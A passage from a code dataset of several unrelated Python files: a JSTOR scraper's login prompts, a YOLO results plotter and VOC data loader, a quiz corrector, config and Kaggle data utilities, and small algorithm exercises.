\"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" You will need ffmpeg and ffprobe installed on your device.\"\n )\n\n print(\n \"\\n\\nBefore you start, \"\n + colored(\"ensure that you:\", attrs=[\"reverse\"]) * (is_windows)\n + colored(\"ensure that you:\", attrs=[\"bold\", \"underline\"]) * (not is_windows)\n )\n\n print(\n \"• Have Google Chrome installed. To install, visit https://support.google.com/chrome/answer/95346?hl=en&ref_topic=7439538. \\n• Have ffmpeg and ffprobe installed. For installation instructions, visit https://www.wikihow.com/Install-FFmpeg-on-Windows. 
\\n• Have a stable internet connection.\\n• Keep your device on charge and set to 'never sleep' while on battery and on charge.\"\n * (is_windows)\n )\n\n print(\n \"• Have Google Chrome installed. To install, visit https://support.google.com/chrome/answer/95346?hl=en&ref_topic=7439538. \\n• Have ffmpeg and ffprobe installed. For installation instructions, visit https://bbc.github.io/bbcat-orchestration-docs/installation-mac-manual/. \\n• Have a stable internet connection.\\n• Keep your device on charge and set to 'never sleep' while on battery and on charge.\"\n * (not is_windows)\n )\n\n print(\n \"\\n\\nWhile the program runs, \"\n + colored(\"please do not:\", attrs=[\"reverse\"]) * (is_windows)\n + colored(\"please do not:\", attrs=[\"bold\", \"underline\"]) * (not is_windows)\n )\n\n print(\n \"\\n• Close the Google Chrome window that will be opened in the next steps.\\n• Interfere with the Google Chrome window unless prompted to do so.\"\n )\n\n get_input(\n colored(\"\\n\\n-- Press \")\n + colored(\"ENTER/RETURN\", attrs=[\"reverse\"]) * (is_windows)\n + colored(\"ENTER/RETURN\", attrs=[\"bold\"]) * (not is_windows)\n + colored(\" to continue: \")\n )\n\n\ndef print_login_instructions():\n\n print(\"\\n\\n\\n\" + colored(\"JSTOR Login\", attrs=[\"reverse\"]))\n\n print(\n \"\\n\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" To continue, a JSTOR user login is required, either via institution VPN/wifi or manually via the JSTOR website.\"\n )\n\n time.sleep(1)\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" No login information will be recorded in the process.\"\n )\n\n time.sleep(1)\n\n print(\n \"\\n\\n\"\n + colored(\"User credential security information:\", attrs=[\"reverse\"])\n * (is_windows)\n + colored(\"User credential security information:\", attrs=[\"bold\", \"underline\"])\n * (not is_windows)\n )\n\n print(\n \"\\n\\n• If you choose to login via VPN or wifi, your credentials will already be authenticated and you won't need to provide\\n any login details.\\n• If you choose to login via the JSTOR website, you will be prompted to enter your login details via your university\\n portal on JSTOR.\"\n )\n\n time.sleep(2)\n\n print(\n \"\\n\\n\"\n + colored(\"JSTOR Login Instructions:\", attrs=[\"reverse\"]) * (is_windows)\n + colored(\"JSTOR Login Instructions:\", attrs=[\"bold\", \"underline\"])\n * (not is_windows)\n + \"\\n\"\n )\n\n\ndef receive_login_action():\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Please follow the prompts below to login.\"\n )\n\n login_method = get_input(\n colored(\n \"\\n-- Type [1] to login via institution VPN or wifi\"\n + \"\\n-- Type [2] to manually login via the JSTOR website\"\n + \"\\n-- Type [3] to return to main menu\"\n + \"\\n : \",\n )\n )\n\n return login_method\n\n\ndef vpn_login(driver, url, html_load, html_login):\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Follow the steps below:\"\n )\n\n time.sleep(1)\n\n print(\n colored(\n \"\\n\\nStep 1/1: Please connect to your institution's VPN or wifi, then continue.\\n\",\n \"blue\",\n )\n )\n\n time.sleep(1)\n\n cont = receive_proceed_action()\n\n if cont == \"1\":\n\n print(\"\\nGive it a 
second, we are checking for successful login.\\n\")\n\n driver.get(url)\n\n if validate_page_load(driver, html_load) == False:\n return False\n\n time.sleep(2)\n\n if validate_login(driver, html_login) == True:\n\n driver.maximize_window()\n\n return True\n\n else:\n\n return False\n\n elif cont == \"2\":\n\n driver.close()\n\n return False\n\n\ndef manual_login(driver, url, html_load, html_login):\n\n print(\"\\nYou are now being routed to JSTOR home page.\")\n\n time.sleep(2)\n\n print(\"\\nSit tight and wait for Google Chrome to open on your screen.\\n\")\n\n time.sleep(2)\n\n print(\n \"\\n\"\n + (colored(\" i \", \"blue\", attrs=[\"reverse\"])) * (is_windows)\n + (emoji.emojize(\":information:\")) * (not is_windows)\n + \" While the browser opens, read through the login steps:\"\n )\n\n time.sleep(1)\n\n print(\n colored(\n \"\\nStep 1/4: Navigate to the top of the JSTOR home page, and click on the link: \",\n \"blue\",\n )\n + colored(\n \"Log in through your library.\",\n \"blue\",\n attrs=[\"reverse\"],\n )\n * (is_windows)\n + colored(\n \"Log in through your library.\",\n \"blue\",\n attrs=[\"bold\"],\n )\n * (not is_windows)\n + colored(\n \"\\nStep 2/4: Search for your institution by using the search box.\\nStep 3/4: Log in using your institution's login credentials.\\nStep 4/4: Accept the cookies.\",\n \"blue\",\n )\n )\n\n time.sleep(1)\n\n print(\"\\nGive it a second, we are checking if the page has loaded successfully.\")\n\n driver.get(url)\n\n if validate_page_load(driver, html_load) == False:\n\n return False\n\n try:\n driver.maximize_window()\n except:\n print(\n \"\\n\"\n + (colored(\" i \", \"blue\", attrs=[\"reverse\"])) * (is_windows)\n + (emoji.emojize(\":information:\")) * (not is_windows)\n + (\n \" Failed to open browser window. Please open the Google Chrome tab below.\"\n )\n )\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Once you have completed the steps, continue:\"\n )\n\n cont = receive_proceed_action()\n\n if cont == \"1\":\n\n if validate_page_load(driver, html_load) == False:\n\n return False\n\n print(\"\\nChecking for successful login.\\n\")\n\n time.sleep(1)\n\n if validate_login(driver, html_login) == True:\n\n try:\n driver.maximize_window()\n driver.set_window_position(-2024, 2024)\n except:\n driver.set_window_position(-2024, 2024)\n\n return True\n\n else:\n\n return False\n\n else:\n\n driver.close()\n\n return False\n\n\ndef validate_page_load(driver, html_load):\n\n try:\n\n WebDriverWait(driver, 60).until(\n expected_conditions.element_to_be_clickable(\n (\n By.CLASS_NAME,\n html_load,\n )\n )\n )\n\n except:\n\n print(\n \"\\n\"\n + colored(\" ! \", \"red\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":red_exclamation_mark:\") * (not is_windows)\n + colored(\" Unable to load JSTOR page.\\n\", \"red\")\n )\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Check your internet connection and try again.\\n\"\n )\n\n driver.close()\n\n return False\n\n \"pds__access-provided-by\"\n\n\ndef validate_login(driver, html_login):\n\n try:\n driver.find_element(By.CLASS_NAME, html_login)\n\n time.sleep(1)\n\n print(\n \"\\n\"\n + colored(\" ! 
\", \"green\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":check_mark_button:\") * (not is_windows)\n + colored(\" Login was successful!\\n\", \"green\")\n )\n\n time.sleep(1)\n\n return True\n\n except:\n\n time.sleep(1)\n\n print_unsuccessful()\n\n return False\n\n\ndef print_unsuccessful():\n\n print(\n \"\\n\"\n + colored(\" ! \", \"red\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":red_exclamation_mark:\") * (not is_windows)\n + colored(\" Login was unsuccessful\\n\", \"red\")\n )\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Try again, make sure you follow the instructions carefully.\\n\"\n )\n\n\ndef receive_proceed_action():\n\n proceed_input = get_input(\n colored(\n \"\\n-- Type [1] to continue\\n-- Type [2] to return to contributions menu\\n : \"\n )\n )\n if proceed_input != \"1\" and proceed_input != \"2\":\n\n print_typo()\n\n return receive_proceed_action()\n\n return proceed_input\n\n\ndef receive_end_program_action(driver):\n\n exit_program = get_input(\n colored(\n \"\\n-- Type [1] to make another contribution\\n-- Type [2] to go back to main menu\\n-- Type [3] to exit\\n : \"\n )\n )\n\n try:\n return process_end_program_action(driver, exit_program)\n except TypoException:\n return receive_end_program_action(driver)\n\n\ndef process_end_program_action(driver, exit_program):\n\n if exit_program == \"1\":\n return 0\n elif exit_program == \"2\":\n driver.close()\n raise MainException\n elif exit_program == \"3\":\n driver.close()\n os._exit(0)\n\n else:\n print_typo()\n raise TypoException\n\n\ndef get_input(text):\n return input(text).strip()\n","repo_name":"FinHubSA/AK-PDF-Scraper","sub_path":"src/user_login.py","file_name":"user_login.py","file_ext":"py","file_size_in_byte":11456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37704310076","text":"from pathlib import Path\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\ndef plot_results(start=0, stop=0, bucket='', id=(), labels=(), save_dir=''):\n # Plot training 'results*.txt'. from utils.plots import *; plot_results(save_dir='runs/train/exp')\n fig, ax = plt.subplots(2, 5, figsize=(12, 6), tight_layout=True)\n ax = ax.ravel()\n s = ['Box', 'Objectness', 'Classification', 'Precision', 'Recall',\n 'val Box', 'val Objectness', 'val Classification', 'mAP@0.5', 'mAP@0.5:0.95']\n if bucket:\n # files = ['https://storage.googleapis.com/%s/results%g.txt' % (bucket, x) for x in id]\n files = ['results%g.txt' % x for x in id]\n c = ('gsutil cp ' + '%s ' * len(files) + '.') % tuple('gs://%s/results%g.txt' % (bucket, x) for x in id)\n os.system(c)\n else:\n files = list(Path(save_dir).glob('results*.txt'))\n assert len(files), 'No results.txt files found in %s, nothing to plot.' 
% os.path.abspath(save_dir)\n for fi, f in enumerate(files):\n try:\n results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T\n n = results.shape[1] # number of rows\n x = range(start, min(stop, n) if stop else n)\n for i in range(10):\n y = results[i, x]\n if i in [0, 1, 2, 5, 6, 7]:\n y[y == 0] = np.nan # don't show zero loss values\n # y /= y[0] # normalize\n label = labels[fi] if len(labels) else f.stem\n ax[i].plot(x, y, marker='.', label=label, linewidth=2, markersize=8)\n ax[i].set_title(s[i])\n # if i in [5, 6, 7]: # share train and val loss y axes\n # ax[i].get_shared_y_axes().join(ax[i], ax[i - 5])\n except Exception as e:\n print('Warning: Plotting error for %s; %s' % (f, e))\n\n ax[1].legend()\n fig.savefig(Path(save_dir) / 'results.png', dpi=200)\n\nplot_results(save_dir='runs/train/yolov7-mixed2')","repo_name":"rico227/traffic-sign-recognition","sub_path":"scripts/plot_unfinished_training_results.py","file_name":"plot_unfinished_training_results.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29156638617","text":"from PIL import Image as im\nimport concurrent.futures as future\nimport cv2 as cv\nimport numpy as np\nfrom pyautogui import *\nfrom time import perf_counter as pc\nfrom graphics import *\nimport operator\n\n\nclass Correct:\n def __init__(self, input):\n self.input = input\n self.score = {}\n self.corrected_skilje = {}\n self.corrected = {} # huriva en person fick rätt eller fel på en fråga\n self.sorted_by_skilje = []\n self.question_number = 0\n\n def get_names(self):\n return self.input.get_names()\n\n def get_sorted_by_skilje(self):\n return self.sorted_by_skilje\n\n def get_one_correct_answers(self, question_number):\n self.question_number = question_number\n for image_name in self.input.answers:\n if question_number == 0:\n self.corrected[self.input.get_names()[image_name]] = {}\n self.score[image_name] = 0\n else:\n # print(str(self.input.correct_answers[question_number]))\n if str(self.input.answers[image_name][question_number]) == str(\n self.input.correct_answers[question_number]\n ):\n self.corrected[self.input.get_names()[image_name]][\n question_number\n ] = \"correct\"\n self.score[image_name] += 1\n else:\n self.corrected[self.input.get_names()[image_name]][\n question_number\n ] = \"wrong\"\n # print(self.score, \"poäng\")\n\n def get_correct_answers(\n self,\n ): # ifall man är otolig och vill rätta allt samtidigt;)\n for image_name in self.input.answers:\n self.corrected[image_name] = {}\n self.score[image_name] = 0\n for question_number in self.input.correct_answers:\n if str(self.input.answers[image_name][question_number]) == str(\n self.input.correct_answers[question_number]\n ):\n self.corrected[image_name][question_number] = \"correct\"\n self.score[image_name] += 1\n else:\n self.corrected[image_name][question_number] = \"wrong\"\n # print(self.score, \"score\")\n\n def compare_skilje(self):\n # returnar kanske en dic med imagename:skillnad ifrån svaret.\n for image_name in self.input.answers:\n diff = abs(\n int(self.input.skilje[image_name]) - int(self.input.correct_skilje)\n )\n self.corrected_skilje[image_name] = diff\n\n def dont_compare_skilje(self):\n for image_name in self.input.answers:\n self.corrected_skilje[image_name] = int(self.input.skilje[image_name])\n\n def print_method(self):\n self.sorted_by_skilje = []\n sorted_by_value = dict(\n sorted(self.score.items(), key=operator.itemgetter(1), 
reverse=True)\n )\n self._print_method(True, sorted_by_value)\n i = 0\n for name_list in self.sorted_by_skilje:\n self.sorted_by_skilje[i][0] = self.input.get_names()[name_list[0]]\n i += 1\n\n def _print_method(self, bol, sorted_by_value): # första sorteringen\n i = 1\n bol = False # om man gått igenom en hel print_method utan att ändra ordning i listan är man klar och bol blir False.\n for image_name, score in sorted_by_value.items():\n if i == 1:\n self.sorted_by_skilje.append(\n [image_name, score, self.corrected_skilje[image_name]]\n )\n else:\n if sorted_by_value[image_name] == self.sorted_by_skilje[i - 2][1]:\n if (\n self.corrected_skilje[image_name]\n < self.sorted_by_skilje[i - 2][2]\n ):\n bol = True\n last_sorted = self.sorted_by_skilje[i - 2]\n self.sorted_by_skilje[i - 2] = [\n image_name,\n score,\n self.corrected_skilje[image_name],\n ]\n self.sorted_by_skilje.append(last_sorted)\n else:\n\n self.sorted_by_skilje.append(\n [image_name, score, self.corrected_skilje[image_name]]\n )\n else:\n self.sorted_by_skilje.append(\n [image_name, score, self.corrected_skilje[image_name]]\n )\n i += 1\n # print(self.sorted_by_skilje, \"sorterat by skilje\")\n return self._double_print_method(bol)\n\n def _double_print_method(\n self, bol\n ): # ifall många har exakt samma poäng kan även denna behövas\n i = 1\n if (\n bol == False\n ): # basfall i rekuriton ifall det inte ändrades nåt förra gången är vi klara\n return \"\"\n bol = False\n for image_list in self.sorted_by_skilje:\n image_name = image_list[0]\n score = image_list[1]\n skilje = image_list[2]\n if i != 1:\n if score == self.sorted_by_skilje[i - 2][1]:\n if skilje < self.sorted_by_skilje[i - 2][2]:\n bol = True\n last_sorted = self.sorted_by_skilje[i - 2]\n self.sorted_by_skilje[i - 2] = [\n image_name,\n score,\n self.corrected_skilje[image_name],\n ]\n self.sorted_by_skilje[i - 1] = last_sorted\n else:\n self.sorted_by_skilje[i - 1] = [\n image_name,\n score,\n self.corrected_skilje[image_name],\n ]\n i += 1\n return self._double_print_method(bol)\n","repo_name":"jonatca/paperQuizCorrector","sub_path":"correct.py","file_name":"correct.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24183966578","text":"import os\nimport platform\n\nimport yaml\n\n# All configs placed into config/configs.yaml file. 
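Every value can also be overridden at runtime by an environment variable with the same upper-cased key (handled by get_value below). 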
Please declare only variables here and set all values in yaml file\n\nwith open(f'{os.path.dirname(os.path.abspath(__file__))}/configs.yaml') as CONFIGS:\n CONFIGS = yaml.safe_load(CONFIGS)\n ENV_CONFIGS = CONFIGS['environments'][os.getenv('ENVIRONMENT', 'dev')]\n URLS = CONFIGS['urls']\n GENERAL = CONFIGS['general']\n CONTROLLERS = CONFIGS['controllers']\n\n\n def get_value(key, key_type, *args):\n \"\"\"\n Get constant value from YAML file by default, or from environment variables if exists\n \"\"\"\n value = os.getenv(key.upper(), key_type[key])\n if args and not os.getenv(key.upper()):\n value = value.format(*args)\n return value\n\n\n # Environment settings\n TOKEN = os.getenv('TOKEN', get_value('token', CONFIGS))\n MAIN_API_URL = get_value('main_api_url', URLS)\n\n PROJECT = get_value('project', GENERAL)\n LINK_TYPE_TEST_CASE = get_value('link_type_test_case', GENERAL)\n LINK_TYPE_LINK = get_value('link_type_link', GENERAL)\n TEST_CASE = get_value('test_case', GENERAL)\n BUG = get_value('bug', GENERAL)\n GITHUB = get_value('git_path', GENERAL)\n FILTERED_LOG_ENDPOINTS = get_value('filtered_log_endpoints', CONFIGS)\n\nOS_NAME = platform.system()\nOS_VERSION = platform.version()\nOS_ARCHITECTURE = platform.architecture()\nTEST_DATA_DIR = 'framework/api/test_data'\n\nUSERS_PATH = get_value('users', CONTROLLERS)\n","repo_name":"Goraved/Typhon-API","sub_path":"configuration/config_parse.py","file_name":"config_parse.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30021172422","text":"\"\"\" data_tools module.\nContains DataTools class for data-oriented tasks\n\"\"\"\n\nimport os\nfrom datetime import datetime\nfrom typing import Tuple, Optional, Union\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nfrom ..context import KglToolsContext, KglToolsContextChild\n\n__all__ = ['DataTools']\n\n\nclass DataTools(KglToolsContextChild):\n \"\"\" Data manipulating class\n Класс для работы с данными (загрузка, сохранение, разбивка и т.д.)\n\n Args:\n context: Контекст окружения\n\n Attributes:\n context (KglToolsContext): Контекст окружения\n settings (dict): Словарь с настройками\n random_state (int): Инициализирующее random значение\n X_train (pd.DataFrame): Обучающая выборка данных\n y_train (Union[pd.DataFrame, pd.Series]): Обучающая выборка данных\n X_validate, (pd.DataFrame): Валидационная выборка данных\n y_validate (Union[pd.DataFrame, pd.Series]): Валидационная выборка данных\n \"\"\"\n\n def __init__(self, context: KglToolsContext) -> None:\n super().__init__(context)\n self.settings = context.settings.get('data_tools', dict())\n self.random_state = context.random_state\n self.X_train = None\n self.y_train = None\n self.X_validate = None\n self.y_validate = None\n\n def get_validate_split(self,\n X: pd.DataFrame,\n y: Optional[pd.DataFrame] = None,\n validation_size: float = 0.2) -> Tuple[pd.DataFrame, ...]:\n \"\"\" Get validation split of the dataset\n Разбивка датасета на обучающую и валидационную выборки\n\n Args:\n X: Исходный датасет\n y: Датасет (вектор) с истинными ответами\n validation_size: Пропорция разбиения\n\n Returns:\n Кортеж датасетов (разбивок)\n \"\"\"\n if y is None:\n X_t, X_v = train_test_split(X, test_size=validation_size, shuffle=True,\n random_state=self.random_state)\n self.X_train = X_t\n self.X_validate = X_v\n return (X_t, X_v)\n else:\n X_t, X_v, y_t, y_v = train_test_split(X, y, 
test_size=validation_size, shuffle=True,\n stratify=y, random_state=self.random_state)\n self.X_train = X_t\n self.X_validate = X_v\n self.y_train = y_t\n self.y_validate = y_v\n return (X_t, X_v, y_t, y_v)\n\n def write_submission(self, predictions: np.ndarray) -> None:\n \"\"\" Write submissions file in proper format\n Запись файла с предсказаниями в заданном формате\n\n Args:\n predictions: Вектор или матрица с предсказаниями\n \"\"\"\n submission_settings = self.settings['submission_params']\n\n sample_submission_path = os.path.join(self.settings['path'], submission_settings['sample_file'])\n\n if not os.path.exists(sample_submission_path):\n print('DataTools::write_submission(): sample submission file is not exist!')\n return\n\n sample_sbm = pd.read_csv(sample_submission_path, **submission_settings['pd_read_csv_params'])\n sample_sbm[submission_settings['target_fields']] = predictions\n\n if not os.path.isdir(submission_settings['submissions_dir']):\n try:\n os.mkdir(submission_settings['submissions_dir'])\n except OSError:\n print('Can\\'t create metasets directory!')\n return\n\n sbm_filename = '{}_sbm.csv'.format(datetime.now().strftime(\"%Y-%m-%d_%H-%M\"))\n smb_filepath = os.path.join(submission_settings['submissions_dir'], sbm_filename)\n\n sample_sbm.to_csv(smb_filepath, **submission_settings['pd_write_csv_params'])\n\n print('save submission:\\n{}'.format(sbm_filename))\n\n def write_metaset(self, df: pd.DataFrame, filename: str) -> None:\n \"\"\" Write metaset file\n Запись датасета метапризнаков с указанным именем\n\n Args:\n df: Заданный датасет\n filename: Имя файла датасета\n \"\"\"\n metaset_settings = self.settings['metaset_params']\n\n if not os.path.isdir(metaset_settings['metasets_dir']):\n try:\n os.mkdir(metaset_settings['metasets_dir'])\n except OSError:\n print('Can\\'t create metasets directory!')\n return\n\n metaset_filepath = os.path.join(metaset_settings['metasets_dir'], filename)\n df.to_csv(metaset_filepath, header=True, index=True)\n\n def read_metaset(self, filename: str) -> Optional[pd.DataFrame]:\n \"\"\" Read metaset file\n Чтение датасета метапризнаков с указанным именем\n\n Args:\n filename: Имя файла датасета\n\n Returns:\n Датасет метапризнаков\n \"\"\"\n metaset_settings = self.settings['metaset_params']\n metaset_filepath = os.path.join(metaset_settings['metasets_dir'], filename)\n\n if not os.path.exists(metaset_filepath):\n print('DataTools::read_metaset(): metaset file is not exist!')\n return None\n\n return pd.read_csv(metaset_filepath, index_col=0)\n","repo_name":"aborisihin/kaggle_tools","sub_path":"kgltools/data_tools/_data_tools.py","file_name":"_data_tools.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40351087244","text":"#%matplotlib inline\n#import matplotlib.pyplot as plt\nimport os\nimport numpy as np\ndef assign_case_to_bin(case_label, bin_edges):\n i=0\n while i= bin_edges[i]:\n return i, bin_edges[i], bin_edges[i+1]\n else:\n i+=1\n\ngene_list= [\n'MGP']\nfor gene in gene_list:\n csvs={}\n splits= ['split1', 'split2', 'split3']#,'split4']\n for split in splits:\n #print(split)\n FOLDER='./data/intermediate_results/models/output_models/{}/{}/'.format(gene,split)\n file = open(\"{}attention_values_{}.csv\".format(FOLDER,split),'r')\n csvs[split]=file\n test_images_list = open(\"{}attention_cases_{}.csv\".format(FOLDER,split),'r').readlines()\n ensemble_attention_record = 
open(\"./results/intermediate_results/models/output_models/{}/ensemble_attention_record.csv\".format(gene), 'w')\n labels_file_lines = open(\"./data/splits/normalized/test/{}_test.csv\".format(gene),\"r\").readlines()\n n_patches_per_case=np.load(\"./data/test_files_infolders.npy\", allow_pickle=True).item()\n\n cases=[]\n labels=[]\n labels_dic={}\n for line in labels_file_lines:\n case=line.split(',')[0]\n cases.append(case)\n labels_dic[case]=float(line.split(', ')[1].strip('\\n'))\n labels.append(float(line.split(', ')[1].strip('\\n')))\n hist, bin_edges = np.histogram(labels, bins=7)\n\n values=np.zeros(86830)\n\n for file_index in range(0,86830):\n for split in splits:\n values[file_index]+=float(csvs[split].readline())\n values[file_index]/=len(splits)\n\n for file_index in range(0,86830):\n file_name = test_images_list[file_index].strip('\\n')\n case_id = file_name.split('10x/')[1]\n case_id = case_id[:12]\n label = labels_dic[case_id]\n bin_idx, min_edge, max_edge = assign_case_to_bin(label, bin_edges)\n ensemble_attention_value = values[file_index]\n n_patches = n_patches_per_case[case_id]\n ensemble_attention_record.write(f\"{file_name}, {case_id}, {label}, {bin_idx}, {min_edge}, {max_edge}, {ensemble_attention_value}, {n_patches}\\n\")\n\n ensemble_attention_record.close()\n for k in csvs.keys():\n csvs[k].close()\n","repo_name":"maragraziani/interpretableWSItoRNAseq","sub_path":"code/interpretability/create_attention_record.py","file_name":"create_attention_record.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"177631853","text":"from typing import Union\nimport numpy as np\nimport tensorflow as tf\nimport pandas as pd\nimport tqdm\n\nfrom typing import (\n List as list, \n Tuple as tuple, \n Dict as dict\n)\n\nimport sys\nsys.path.append(\"../\")\n\nimport utils # type: ignore\n# from .. 
import utils # for autocompletion purposes\n\ndef load_data(path: str) -> tuple[\n Union[list[str], dict[str, int]],\n pd.DataFrame\n ]:\n data = pd.read_parquet(path)\n classes: Union[list[str], dict[str, int]] = data.detection_object.unique()\n classes = {_class: i for i, _class in enumerate(classes)}\n data.detection_object = data.detection_object.map(classes)\n classes = {i: _class for _class, i in classes.items()}\n return classes, data\n\n\ndef create_tf_datasets(\n paths: list[str],\n bboxes_classes: list[tuple[float, float, float, float, int]]\n ) -> tf.data.Dataset:\n paths_tf = tf.data.Dataset.from_tensor_slices(paths)\n bboxes_classes_tf = tf.data.Dataset.from_tensor_slices(bboxes_classes)\n return tf.data.Dataset.zip(\n (paths_tf, bboxes_classes_tf)\n )\n\n\ndef path_to_image(path: str) -> np.uint8:\n image = utils.read_image(f\".{path.numpy().decode('utf-8')}\")\n image = utils.resize_dimensions(image, (448, 448))\n return image\n\n\ndef detection_to_grid(\n bbox_class: tuple[float, float, float, float, int],\n S: int = 7, B: int = 2, C: int = 20) -> np.ndarray:\n grid_detection = np.zeros((S, S, C + 5 * B))\n ##################################################################\n # #\n #[20 grids ~~ classes, 2 bounding boxes [x, y, w, h, confidence]]#\n # #\n ##################################################################\n for *bounding_box, detection_class in bbox_class.numpy():\n detection_class = detection_class.astype(np.uint8)\n grid_x = int(np.floor(S * bounding_box[0]))\n grid_y = int(np.floor(S * bounding_box[1]))\n if not (grid_x == 7 or grid_y == 7):\n if grid_detection[grid_y, grid_x, 20] == 0:\n # Set that there exists an object\n grid_detection[grid_y, grid_x, 20] = 1\n grid_detection[grid_y, grid_x, 21:25] = bounding_box\n grid_detection[grid_y, grid_x, detection_class] = 1 \n return grid_detection\n\ndef VOCDataLoader() -> tf.data.Dataset:\n data_path = \"VOC_2012_detections.parquet\"\n classes, data = load_data(data_path)\n paths = []\n bboxes_classes = []\n for path, group in tqdm.tqdm(data.groupby(\"path\")):\n paths.append(path)\n bboxes_classes.append(group[['x_yolo', 'y_yolo', 'w_norm', 'h_norm', 'detection_object']].values)\n paths = tf.constant(paths)\n bboxes_classes = tf.ragged.constant(bboxes_classes)\n\n dataset = create_tf_datasets(paths, bboxes_classes)\n dataset = dataset.map(\n lambda path, bbox_class: (\n tf.py_function(\n func=path_to_image,\n inp=[path],\n Tout=tf.float32\n ), bbox_class)\n ).map(\n lambda image, bbox_class: (image,\n tf.py_function(\n func=detection_to_grid,\n inp=[bbox_class],\n # adding square brackets to Tout type adds dimension # DON'T\n Tout=tf.float32 \n ))\n ).batch(16)\n\n return dataset\n\n\nif __name__ == \"__main__\":\n data_path = \"VOC_2012_detections.parquet\"\n classes, data = load_data(data_path)\n paths = data[['path']].values\n bboxes = data[['x_yolo', 'y_yolo', 'w_norm', 'h_norm']].values\n detection_classes = data[['detection_object']].values\n for index, (name, group) in enumerate(data.groupby(\"path\")):\n image = utils.visualize_bounding_boxes(\n utils.read_image(f\".{name}\"), \n group[['xmin', 'ymin', 'xmax', 'ymax', 'detection_object']].values,\n classes\n )\n image = utils.show_image(image)\n if index == 10:\n break\n","repo_name":"Marvin-desmond/yolo-v1-unified-detection","sub_path":"TensorFlow_YOLO1/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"27326857575","text":"def SVD(mat, initial_mat1, initial_mat2, learn_rate, iterations):\n ## reassigning values in order to keep code clean\n # the m by n matrix that we want to approximate\n A = mat\n # two matrices from which we will start: B is m by k\n B = initial_mat1\n # C is n by k\n C = initial_mat2\n # learning rate, or step of learning\n alpha = learn_rate\n # number of iterations\n N = iterations\n # A ~ B * C^t : the first approximation based on given initial matrices\n A_app = np.dot(B, C.T)\n # gradient descent\n for i in range(N):\n # partial derivatives for matrices\n dLdB = np.dot((A_app - A), C)\n dLdC = np.dot((A_app - A).T, B)\n # updating matrices\n C = C - alpha * dLdC\n B = B - alpha * dLdB\n # calculating approximated matrix\n A_app = np.dot(B, C.T)\n # returning two matrices that can be used for A approximation\n return B, C, A_app\n","repo_name":"NikitaKudin/ml","sub_path":"L9/SVD.py","file_name":"SVD.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19817652723","text":"numbers = [7, 0, 8, 2, 8, 3, 1, 5, 7, 6, 2] \nhand = \"left\"\nanswer = ''\nlefthand = 10\nrighthand = 12\nfor i in numbers:\n if i == 0:\n i = 11\n\n\n if (i == 3 or i == 6 or i == 9):\n \n answer += 'R'\n righthand = i\n elif (i == 1 or i == 4 or i == 7):\n answer += 'L'\n lefthand = i\n else:\n ledis = abs(i - lefthand) // 3 + abs(i - lefthand) % 3\n ridis = abs(i - righthand) // 3 + abs(i - righthand) % 3\n\n if ledis > ridis:\n answer += 'R'\n righthand = i\n elif ledis < ridis:\n answer += 'L'\n lefthand = i\n else:\n if hand == \"right\":\n answer += 'R'\n righthand = i\n elif hand == \"left\":\n answer += 'L'\n lefthand = i\n\n\n\n\n\n\n\n\nprint(answer)\n\n\n\n","repo_name":"jhl9617/Algorithms","sub_path":"프로그래머스/키패드 누르기.py","file_name":"키패드 누르기.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8269864790","text":"n = int(input())\narray = list(map(int, input().split()))\nsum_value = sum(array)\nif sum_value % 4:\n print(0)\nelse:\n cnt = [0] * 4\n cnt[0] = 1\n prefix_sum = 0\n division = sum_value // 4\n for i in range(n - 1):\n prefix_sum += array[i]\n if prefix_sum == 3 * division:\n cnt[3] += cnt[2]\n if prefix_sum == 2 * division:\n cnt[2] += cnt[1]\n if prefix_sum == 1 * division:\n cnt[1] += cnt[0]\n 